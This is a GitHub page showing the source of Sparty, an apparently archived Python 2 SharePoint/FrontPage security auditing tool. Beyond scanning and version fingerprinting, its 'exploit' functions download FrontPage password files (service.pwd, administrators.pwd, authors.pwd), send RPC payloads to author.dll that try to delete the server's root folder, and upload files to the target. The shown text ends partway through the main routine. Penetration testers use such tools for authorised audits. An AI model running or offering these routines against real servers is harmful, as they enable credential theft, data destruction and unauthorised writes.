This repository has been archived by the owner on Sep 15, 2020. It is now read-only.
-
-
Notifications
You must be signed in to change notification settings - Fork 41
/
sparty_v_0.1.py
778 lines (596 loc) · 40.5 KB
/
sparty_v_0.1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
#!/usr/bin/python
# Sparty - Sharepoint/Frontend Auditor
# By: Aditya K Sood - SecNiche Security Labs ! (c) 2013
# Updated/Bugfixes by: Glenn 'devalias' Grant - http://devalias.net/
license = """
Copyright (c) 2013, {Aditya K sood}
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of IOActive or SecNiche nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import os, sys
# Frontend (bin) repository files !
front_bin = ['_vti_inf.html', '_vti_bin/shtml.dll/_vti_rpc','_vti_bin/owssvr.dll','_vti_bin/_vti_adm/admin.dll','_vti_bin/_vti_adm/admin.exe','_vti_bin/_vti_aut/author.exe','_vti_bin/_vti_aut/WS_FTP.log','_vti_bin/_vti_aut/ws_ftp.log','_vti_bin/shtml.exe/_vti_rpc','_vti_bin/_vti_aut/author.dll']
front_services =['_vti_bin/Admin.asmx','_vti_bin/alerts.asmx', '_vti_bin/dspsts.asmx', '_vti_bin/forms.asmx','_vti_bin/Lists.asmx','_vti_bin/people.asmx','_vti_bin/Permissions.asmx','_vti_bin/search.asmx','_vti_bin/UserGroup.asmx','_vti_bin/versions.asmx','_vti_bin/Views.asmx','_vti_bin/webpartpages.asmx','_vti_bin/webs.asmx','_vti_bin/spsdisco.aspx','_vti_bin/AreaService.asmx','_vti_bin/BusinessDataCatalog.asmx','_vti_bin/ExcelService.asmx','_vti_bin/SharepointEmailWS.asmx','_vti_bin/spscrawl.asmx','_vti_bin/spsearch.asmx','_vti_bin/UserProfileService.asmx','_vti_bin/WebPartPages.asmx']
# Frontend (pvt) repository files !
front_pvt = ['_vti_pvt/authors.pwd','_vti_pvt/administrators.pwd','_vti_pvt/users.pwd','_vti_pvt/service.pwd','_vti_pvt/service.grp','_vti_pvt/bots.cnf','_vti_pvt/service.cnf','_vti_pvt/access.cnf','_vti_pvt/writeto.cnf','_vti_pvt/botsinf.cnf','_vti_pvt/doctodep.btr','_vti_pvt/deptodoc.btr','_vti_pvt/linkinfo.cnf','_vti_pvt/services.org','_vti_pvt/structure.cnf','_vti_pvt/svcacl.cnf','_vti_pvt/uniqperm.cnf','_vti_pvt/service/lck','_vti_pvt/frontpg.lck']
# Sharepoint and Frontend (directory) repository !
directory_check = ['_vti_pvt/','_vti_bin/','_vti_log/','_vti_cnf/','_vti_bot','_vti_bin/_vti_adm','_vti_bin/_vti_aut','_vti_txt/']
# Sharepoint repository files !
sharepoint_check_layout =['_layouts/aclinv.aspx','_layouts/addrole.aspx','_layouts/AdminRecycleBin.aspx','_layouts/AreaNavigationSettings.aspx','_Layouts/AreaTemplateSettings.aspx','_Layouts/AreaWelcomePage.aspx','_layouts/associatedgroups.aspx','_layouts/bpcf.aspx','_Layouts/ChangeSiteMasterPage.aspx','_layouts/create.aspx','_layouts/editgrp.aspx','_layouts/editprms.aspx','_layouts/groups.aspx','_layouts/help.aspx','_layouts/images/','_layouts/listedit.aspx','_layouts/ManageFeatures.aspx','_layouts/ManageFeatures.aspx','_layouts/mcontent.aspx','_layouts/mngctype.aspx','_layouts/mngfield.aspx','_layouts/mngsiteadmin.aspx','_layouts/mngsubwebs.aspx','_layouts/mngsubwebs.aspx?view=sites','_layouts/mobile/mbllists.aspx','_layouts/MyInfo.aspx','_layouts/MyPage.aspx','_layouts/MyTasks.aspx','_layouts/navoptions.aspx','_layouts/NewDwp.aspx','_layouts/newgrp.aspx','_layouts/newsbweb.aspx','_layouts/PageSettings.aspx','_layouts/people.aspx','_layouts/people.aspx?MembershipGroupId=0','_layouts/permsetup.aspx','_layouts/picker.aspx','_layouts/policy.aspx','_layouts/policyconfig.aspx','_layouts/policycts.aspx','_layouts/Policylist.aspx','_layouts/prjsetng.aspx','_layouts/quiklnch.aspx','_layouts/recyclebin.aspx','_Layouts/RedirectPage.aspx','_layouts/role.aspx','_layouts/settings.aspx','_layouts/SiteDirectorySettings.aspx','_layouts/sitemanager.aspx','_layouts/SiteManager.aspx?lro=all','_layouts/spcf.aspx','_layouts/storman.aspx','_layouts/themeweb.aspx','_layouts/topnav.aspx','_layouts/user.aspx','_layouts/userdisp.aspx','_layouts/userdisp.aspx?ID=1','_layouts/useredit.aspx','_layouts/useredit.aspx?ID=1','_layouts/viewgrouppermissions.aspx','_layouts/viewlsts.aspx','_layouts/vsubwebs.aspx','_layouts/WPPrevw.aspx?ID=247','_layouts/wrkmng.aspx']
sharepoint_check_forms = ['Forms/DispForm.aspx','Forms/DispForm.aspx?ID=1','Forms/EditForm.aspx','Forms/EditForm.aspx?ID=1','Forms/Forms/AllItems.aspx','Forms/MyItems.aspx','Forms/NewForm.aspx','Pages/default.aspx','Pages/Forms/AllItems.aspx']
sharepoint_check_catalog = ['_catalogs/masterpage/Forms/AllItems.aspx','_catalogs/wp/Forms/AllItems.aspx','_catalogs/wt/Forms/Common.aspx']
refine_target = []
pvt_target = []
dir_target = []
sharepoint_target_layout = []
sharepoint_target_forms = []
sharepoint_target_catalog = []
# verify whether the python libraries are imported successfully or not!
try:
import urllib2
except ImportError:
print "[-] program could not find module : urllib2"
sys.exit (1)
try:
import re
except ImportError:
print "[-] program could not find module : re"
sys.exit (1)
try:
import optparse
except ImportError:
print "[-] program could not find module : optparse"
sys.exit(1)
try:
import httplib
except ImportError:
print "[-] program could not find module : httplib"
sys.exit(1)
# python version check
def check_python():
version = sys.version_info
if version[:2] != (2,6):
print "[-] Sparty is written in Python 2.6.5 (final). Kindly use that version!"
print "[devalias.net] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
print "[devalias.net] !!! HERE THERE BE DRAGONS !!!"
print "[devalias.net] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
unsupported_ver = raw_input("[devalias.net] Would you like to continue past this version check AT YOUR OWN RISK? (Type: YES): ")
if unsupported_ver != "YES":
print "[devalias.net] Probably a safer choice. Exiting! (Entered: %s)" %(unsupported_ver)
sys.exit(0)
# sparty banner
def banner():
print "\t---------------------------------------------------------------"
sparty_banner = """
_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
_| _| _| _| _| _| _| _| _| _|
_|_| _|_|_| _|_|_|_| _|_|_| _| _|
_| _| _| _| _| _| _| _|
_|_|_| _| _| _| _| _| _| _|
SPARTY : Sharepoint/Frontpage Security Auditing Tool!
Authored by: Aditya K Sood |{0kn0ck}@secniche.org | 2013
Twitter: @AdityaKSood
Powered by: SecNiche Security Labs !
"""
print sparty_banner
print "\t--------------------------------------------------------------"
# usage and examples for using sparty
def sparty_usage(destination):
print "[scanning access permissions in forms directory - sharepoint] %s -s forms -u %s " %(sys.argv[0], destination)
print "[scanning access permissions in frontpage directory - frontpage] %s -f pvt -u %s " %(sys.argv[0], destination)
print "[dumping passwords] %s -d dump -u %s " %(sys.argv[0],destination)
print "[note] : please take this into consideration!"
print "\t\t: (1) always specify https | http explcitly !"
print "\t\t: (2) always provide the proper directory structure where sharepoint/frontpage is installed !"
print "\t\t: (3) do not specify '/' at the end of url !"
# build target for scanning frontpage and sharepoint files
def build_target(target, front_dirs=[],refine_target=[]):
for item in front_dirs:
refine_target.append(target+ "/"+ item)
# function to display success notification!
def module_success(module_name):
print "\n[+] check for HTTP codes (200) for active list of accessible files or directories! (404) - Not exists | (403) - Forbidden ! (500) - Server Error"
print "\n[+] (%s) - module executed successfully !\n" %module_name
# extracting information about target's enviornment !
def target_information(name):
try:
headers = urllib2.urlopen(name)
print "[+] fetching information from the given target : (%s)" %(headers.geturl())
print "[+] target responded with HTTP code: (%s)" %headers.getcode()
print "[+] target is running server: (%s)" %headers.info()['server']
except urllib2.HTTPError as h:
print "[-] url error occured - (%s)" % h.code
pass
# audit function for scanning frontpage and sharepoint files
def audit(target=[]):
for element in target:
try:
handle = urllib2.urlopen(element)
info = handle.info()
response_code = handle.getcode()
print "[+] (%s) - (%d)" %(element,response_code)
except urllib2.HTTPError as h:
print "[-] (%s) - (%d)" %(element,h.code)
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
# dump frontpage service and administrators password files if present
def dump_credentials(dest):
pwd_targets = []
pwd_files = ['_vti_pvt/service.pwd','_vti_pvt/administrators.pwd','_vti_pvt/authors.pwd']
for item in pwd_files:
pwd_targets.append(dest + "/" + item)
for entry in pwd_targets:
try:
handle = urllib2.urlopen(entry)
if handle.getcode() == 200:
print "[+] dumping contents of file located at : (%s)" %(entry)
filename = "__dump__.txt"
dump = open(filename, 'a')
dump.write(handle.read())
print handle.read()
except urllib2.HTTPError as h:
print "[-] could not dump the file located at : (%s) | (%d)" %(entry,h.code)
continue
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
continue
print "[*] ---------------------------------------------------------------------------------------"
print "[+] check the (%s) file if generated !\n" %(filename)
# fingerprinting frontpage version using default files !
def fingerprint_frontpage(name):
enum_nix = ['_vti_bin/_vti_aut/author.exe','_vti_bin/_vti_adm/admin.exe','_vti_bin/shtml.exe']
enum_win = ['_vti_bin/_vti_aut/author.dll', '_vti_bin/_vti_aut/dvwssr.dll','_vti_bin/_vti_adm/admin.dll','_vti_bin/shtml.dll']
build_enum_nix = []
build_enum_win = []
for item in enum_nix:
build_enum_nix.append( name + "/" + item)
for entry in build_enum_nix:
try:
info=urllib2.urlopen(entry)
if info.getcode() == 200:
print "[+] front page is tested as : nix version | (%s) | (%d)" %(entry,info.getcode())
except urllib2.HTTPError:
pass
for item in enum_win:
build_enum_win.append( name + "/" + item)
for entry in build_enum_win:
try:
info=urllib2.urlopen(entry)
if info.getcode() == 200:
print "[+] front page is tested as : windows version | (%s) | (%d)" %(entry,info.getcode())
except urllib2.HTTPError:
pass
frontend_version = name + "/_vti_inf.html"
try:
version = urllib2.urlopen(frontend_version)
print"[+] extracting frontpage version from default file : (%s):" %re.findall(r'FPVersion=(.*)',version.read())
except urllib2.HTTPError:
print "[-] failed to extract the version of frontpage from default file!"
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
print "[*] ---------------------------------------------------------------------------------------"
# dump sharepoint headers for version fingerprinting
def dump_sharepoint_headers(name):
print ""
try:
dump_s = urllib2.urlopen(name)
print "[+] configured sharepoint version is : (%s)" %dump_s.info()['microsoftsharepointteamservices']
except KeyError:
print "[-] sharepoint version could not be extracted using HTTP header : MicrosoftSharepointTeamServices !"
try:
dump_f = urllib2.urlopen(name)
print "[+] sharepoint is configured with load balancing capability : (%s)" %dump_f.info()['x-sharepointhealthscore']
except KeyError:
print "[-] sharepoint load balancing ability could not be determined using HTTP header : X-SharepointHealthScore !"
try:
dump_g = urllib2.urlopen(name)
print "[+] sharepoint is configured with explicit diagnosis (GUID based log analysis) purposes : (%s)" %dump_f.info()['sprequestguid']
except KeyError:
print "[-] sharepoint diagnostics ability could not be determined using HTTP header : SPRequestGuid !"
except urllib2.HTTPError:
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
# file uploading routine to upload file remotely on frontpage extensions
def frontpage_rpc_check(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
exp_target_list = ['_vti_bin/shtml.exe/_vti_rpc','_vti_bin/shtml.dll/_vti_rpc']
data = "method= server version"
#data="method=list+services:4.0.2.0000&service_name="
#for item in exploit_targets:
for item in exp_target_list:
destination = name + "/" + item
print "[+] Sending HTTP GET request to - (%s) for verifying whether RPC is listening !" %destination
try:
req = urllib2.Request(destination)
response = urllib2.urlopen(req)
if response.getcode() == 200:
print "[+] target is listening on frontpage RPC - (%s) !\n" % response.getcode()
else:
print "[-] target is not listening on frontpage RPC - (%s) !\n" %response.getcode()
except urllib2.URLError as e:
print "[-] url error ! - %s" % e.code
pass
except httplib.BadStatusLine as h:
print "[-] server responds with bad status !"
pass
print "[+] Sending HTTP POST request to retrieve software version - (%s)" %destination
try:
req = urllib2.Request(destination,data,headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
print "[+] target accepts the request - (%s) | (%s) !\n" % (data, response.getcode())
filename = "__version__.txt" + ".html"
version = open(filename, 'a')
version.write(response.read())
print "[+] check file for contents - (%s) \n" %filename
else:
print "[-] target fails to accept request - (%s) | (%s) !\n" %(data,response.getcode())
except urllib2.URLError as e:
print "[-] url error, seems like authentication is required or server failed to handle request! - - %s" % e.code
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
print "[*] ---------------------------------------------------------------------------------------"
def frontpage_service_listing(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
service_target_list = ['_vti_bin/shtml.exe/_vti_rpc','_vti_bin/shtml.dll/_vti_rpc']
data=['method=list+services:3.0.2.1076&service_name=','method=list+services:4.0.2.471&service_name=','method=list+services:4.0.2.0000&service_name=','method=list+services:5.0.2.4803&service_name=','method=list+services:5.0.2.2623&service_name=','method=list+services:6.0.2.5420&service_name=']
for item in service_target_list:
destination = name + "/" + item
print "[+] Sending HTTP POST request to retrieve service listing - (%s)" %destination
try:
for entry in data:
req = urllib2.Request(destination,entry,headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
print "[+] target accepts the request - (%s) | (%s) !" % (entry, response.getcode())
filename = "__service-list__.txt" + entry + ".html"
service_list = open(filename, 'a')
service_list.write(response.read())
print "[+] check file for contents - (%s) \n" %filename
else:
print "[-] target fails to accept request - (%s) | (%s) !\n" %(data,response.getcode())
except urllib2.URLError as e:
print "[-] url error, seems like authentication is required or server failed to handle request! - - %s" % e.code
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
print "[*] ---------------------------------------------------------------------------------------"
def frontpage_config_check(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
# running some standard commands to retrieve files and configuration checks
# frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803, 5.0.2.2623 , 6.0.2.5420
# version : major ver=n.minor ver=n.phase ver=n.verincr=v
front_exp_target = '_vti_bin/_vti_aut/author.dll'
payloads = ['method=open service:3.0.2.1706&service_name=/', 'method=list documents:3.0.2.1706&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=','method=getdocument:3.0.2.1105&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=','method=open service:4.0.2.4715&service_name=/', 'method=list documents:4.0.2.4715&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=','method=getdocument:4.0.2.4715&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=','method=open service:5.0.2.4803&service_name=/', 'method=list documents:5.0.2.4803&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=','method=getdocument:5.0.2.4803&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=','method=open service:5.0.2.2623&service_name=/', 'method=list documents:5.0.2.2623&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=','method=getdocument:5.0.2.2623&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=','method=open service:6.0.2.5420&service_name=/', 'method=list documents:6.0.2.5420&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=','method=getdocument:6.0.2.5420&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=']
for item in payloads:
destination = name + "/" + front_exp_target
print "[+] Sending HTTP POST request to [open service | listing documents] - (%s)" %destination
try:
req = urllib2.Request(destination,item,headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
print "[+] target accepts the request - (%s) | (%s) !\n" % (item, response.getcode())
filename = "__author-dll-config__.txt" + ".html"
service_list = open(filename, 'a')
service_list.write(response.read())
print "[+] check file for contents - (%s) \n" %filename
else:
print "[-] target fails to accept request - (%s) | (%s) !\n" %(item,response.getcode())
except urllib2.URLError as e:
print "[-] url error, seems like authentication is required or server failed to handle request! - %s \n[-] payload [%s]\n" % (e.code,item)
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
# remove specific folder from the web server
def frontpage_remove_folder(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
# running some standard commands to remove "/" folder from the web server using author.dll
# frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803, 5.0.2.2623 , 6.0.2.5420
file_exp_target = '_vti_bin/_vti_aut/author.dll'
payloads = ['method=remove+documents:3.0.2.1786&service_name=/','method=remove+documents:4.0.2.4715&service_name=/','method=remove+documents:5.0.3.4803&service_name=/','method=remove+documents:5.0.2.4803&service_name=/','method=remove+documents:6.0.2.5420&service_name=/']
for item in payloads:
destination = name + "/" + file_exp_target
print "[+] Sending HTTP POST request to remove '/' directory to - (%s)" %destination
try:
req = urllib2.Request(destination,item,headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
print "[+] folder removed successfully - (%s) | (%s) !\n" % (item, response.getcode())
for line in response.readlines():
print line
else:
print "[-] fails to remove '/' folder at - (%s) | (%s) !\n" %(item,response.getcode())
except urllib2.URLError as e:
print "[-] url error, seems like authentication is required or server failed to handle request! - %s \n[-] payload [%s]\n" % (e.code,item)
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
# file uploading through author.dll
def file_upload_check(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
# running some standard commands to upload file to web server using author.dll
# frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803, 5.0.2.2623 , 6.0.2.5420
os.system("echo 'Sparty Testing !' > sparty.txt")
file_exp_target = '_vti_bin/_vti_aut/author.dll'
payloads = ['method=put document:3.0.2.1706&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false','method=put document:4.0.2.4715&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false','method=put document:5.0.2.2623&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false','method=put document:5.0.2.4823&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false','method=put document:6.0.2.5420&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false']
for item in payloads:
destination = name + "/" + file_exp_target
print "[+] Sending HTTP POST request for uploading file to - (%s)" %destination
try:
req = urllib2.Request(destination,item,headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
print "[+] file uploaded successfully - (%s) | (%s) !\n" % (item, response.getcode())
for line in response.readlines():
print line
else:
print "[-] file fails to upload at - (%s) | (%s) !\n" %(item,response.getcode())
except urllib2.URLError as e:
print "[-] url error, seems like authentication is required or server failed to handle request! - %s \n[-] payload [%s]\n" % (e.code,item)
pass
except httplib.BadStatusLine:
print "[-] server responds with bad status !"
pass
# devalias.net - Authentication
def enable_ntlm_authentication(user = "", password = "", url = ""):
print "[+][devalias.net] Enabling NTLM authentication support"
# Import ntlm library
try:
# import ntlm
from ntlm import HTTPNtlmAuthHandler
print "[+][devalias.net][NTLM Authentication] NTLM Support Library Loaded!"
except ImportError:
print "[-][devalias.net][NTLM Authentication] Program could not find module : ntlm (Is the ntlm library installed/available locally?"
sys.exit (1)
try:
from urlparse import urlparse, urlunparse
except ImportError:
print "[-][devalias.net][NTLM Authentication] Program could not find module : urlparse"
sys.exit (1)
if user == "":
user = raw_input("[+][devalias.net][NTLM Authentication] Enter username (DOMAIN\username): ")
if password == "":
password = raw_input("[+][devalias.net][NTLM Authentication] Enter password: ")
parsed_url = urlparse(url)
base_uri = urlunparse((parsed_url[0],parsed_url[1],"","","",""))
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, base_uri, user, password)
# create the NTLM authentication handler
auth_NTLM = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passman)
# other authentication handlers
auth_basic = urllib2.HTTPBasicAuthHandler(passman)
auth_digest = urllib2.HTTPDigestAuthHandler(passman)
# disable proxies (if you want to stay within the corporate network)
# proxy_handler = urllib2.ProxyHandler({})
proxy_handler = urllib2.ProxyHandler()
# create and install the opener
opener = urllib2.build_opener(proxy_handler, auth_NTLM, auth_digest, auth_basic)
urllib2.install_opener(opener)
print "[+][devalias.net][NTLM authentication] Credentials enabled for " + user
# main routine to trigger sub routines (functions) !
def main():
check_python()
banner()
parser = optparse.OptionParser(usage="usage: %prog [options]", version="%prog 1.0")
front_page = optparse.OptionGroup(parser,"Frontpage:")
share_point = optparse.OptionGroup(parser,"Sharepoint:")
mandatory = optparse.OptionGroup(parser,"Mandatory:")
exploit = optparse.OptionGroup(parser,"Information Gathering and Exploit:")
authentication = optparse.OptionGroup(parser,"Authentication [devalias.net]")
general = optparse.OptionGroup(parser,"General:")
mandatory.add_option("-u","--url", type="string" , help="target url to scan with proper structure", dest="url")
front_page.add_option("-f", "--frontpage", type="choice", choices=['pvt' ,'bin'], help="<FRONTPAGE = pvt | bin> -- to check access permissions on frontpage standard files in vti or bin directory!", dest="frontpage")
share_point.add_option("-s","--sharepoint", type="choice", choices=['forms','layouts','catalog'], help="<SHAREPOINT = forms | layouts | catalog> -- to check access permissions on sharepoint standard files in forms or layouts or catalog directory!", dest="sharepoint")
exploit.add_option("-v","--http_fingerprint", type="choice", choices=['ms_sharepoint','ms_frontpage'], help="<FINGERPRINT = ms_sharepoint | ms_frontpage> -- fingerprint sharepoint or frontpage based on HTTP headers!" , dest="fingerprint")
exploit.add_option("-d","--dump", type="choice", choices=['dump', 'extract'] , help="<DUMP = dump | extract> -- dump credentials from default sharepoint and frontpage files (configuration errors and exposed entries)!", dest="dump")
exploit.add_option("-l","--list", type="choice", choices=['list','index'], help="<DIRECTORY = list | index> -- check directory listing and permissions!", dest="directory")
exploit.add_option("-e","--exploit", type="choice", choices=['rpc_version_check','rpc_service_listing', 'author_config_check','rpc_file_upload','author_remove_folder'], help="EXPLOIT = <rpc_version_check | rpc_service_listing | rpc_file_upload | author_config_check | author_remove_folder> -- exploit vulnerable installations by checking RPC querying, service listing and file uploading", dest="exploit")
exploit.add_option("-i","--services", type="choice", choices=['serv','services'], help="SERVICES = <serv | services> -- checking exposed services !", dest="services")
authentication.add_option("-a","--auth-type", type="choice", choices=['ntlm'], help="AUTHENTICATION = <ntlm> -- Authenticate with NTLM user/pass !", dest="authentication")
general.add_option("-x","--examples", type="string",help="running usage examples !", dest="examples")
parser.add_option_group(front_page)
parser.add_option_group(share_point)
parser.add_option_group(mandatory)
parser.add_option_group(exploit)
parser.add_option_group(authentication)
parser.add_option_group(general)
options, arguments = parser.parse_args()
try:
target = options.url
# devalias.net - Authentication
if options.authentication == "ntlm":
enable_ntlm_authentication("", "", target) # Leave user/pass blank to prompt user
# TODO: Enable commandline user/pass?
if target is not None:
target_information(target)
else:
print "[-] specify the options. use (-h) for more help!"
sys.exit(0)
if options.dump=="dump" or options.dump == "extract":
print "\n[+]------------------------------------------------------------------------------------------------!"
print "[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible!"
print "[+]--------------------------------------------------------------------------------------------------!\n"
dump_credentials(target)
module_success("password dumping")
return
elif options.exploit == "rpc_version_check":
print "\n[+]-----------------------------------------------------------------------!"
print "[+] auditing frontpage RPC service !"
print "[+]-------------------------------------------------------------------------!\n"
frontpage_rpc_check(target)
module_success("module RPC version check")
return
elif options.exploit == "rpc_service_listing":
print "\n[+]-----------------------------------------------------------------------!"
print "[+] auditing frontpage RPC service for fetching listing !"
print "[+]-------------------------------------------------------------------------!\n"
frontpage_service_listing(target)
module_success("module RPC service listing check")
return
elif options.exploit == "author_config_check":
print "\n[+]-----------------------------------------------------------------------!"
print "[+] auditing frontpage configuration settings !"
print "[+]-------------------------------------------------------------------------!\n"
frontpage_config_check(target)
module_success("module RPC check")
return
elif options.exploit == "author_remove_folder":
print "\n[+]-----------------------------------------------------------------------!"
print "[+] trying to remove folder from web server !"
print "[+]-------------------------------------------------------------------------!\n"
frontpage_remove_folder(target)
module_success("module remove folder check")
return
elif options.exploit == "rpc_file_upload":
print "\n[+]-----------------------------------------------------------------------!"
print "[+] auditing file uploading misconfiguration !"
print "[+]-------------------------------------------------------------------------!\n"
file_upload_check(target)
